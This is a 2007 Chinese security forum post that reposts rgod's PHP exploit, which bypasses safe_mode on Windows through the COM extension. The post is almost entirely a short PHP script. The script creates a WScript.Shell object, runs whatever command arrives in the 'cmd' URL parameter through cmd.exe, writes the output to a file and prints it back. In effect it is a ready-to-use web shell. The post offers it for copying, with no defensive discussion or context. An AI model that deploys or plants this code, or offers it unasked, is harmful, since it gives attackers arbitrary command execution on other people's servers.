‹‹ 上一主题 | 下一主题 ››
发新话题
打印

PHP COM extensions (inconsistent Win32) safe_mode Bypass Exploit

pub!1c

团队执行官

Rank: 8Rank: 8

E.S.T核心成员

帖子
3926 
精华
128 
积分
209876 
阅读权限
200 
性别
男 
在线时间
1113 小时 
注册时间
2007-10-23 
最后登录
2008-10-6 

资料收集奖 运营支持奖

楼主 发表于 2007-3-8 22:56  只看该作者

PHP COM extensions (inconsistent Win32) safe_mode Bypass Exploit

复制内容到剪贴板
代码:
<?php
  //PHP COM extensions (inconsistent Win32) safe_mode bypass
  //by rgod

  $____suntzu = new COM("WScript.Shell");
  $____suntzu->Run(&#39;c:\windows\system32\cmd.exe /c &#39;.escapeshellarg($_GET[cmd]).&#39; > &#39;.dirname($_SERVER[SCRIPT_FILENAME]).&#39;/suntzoi.txt&#39;);
  $____suntzoi=file("suntzoi.txt");
  for ($i=0; $i<count($____suntzoi); $i++) {echo nl2br(htmlentities($____suntzoi[$i]));}

  // *quote* from the php manual:
  // There is no installation needed to use these functions; they are part of the PHP core.

  // The windows version of PHP has built in support for this extension. You do not need to load any additional extension in order to use these functions.

  // You are responsible for installing support for the various COM objects that you intend to use (such as MS Word);
  // we don&#39;t and can&#39;t bundle all of those with PHP.
?>

TOP

‹‹ 上一主题 | 下一主题 ››
发新话题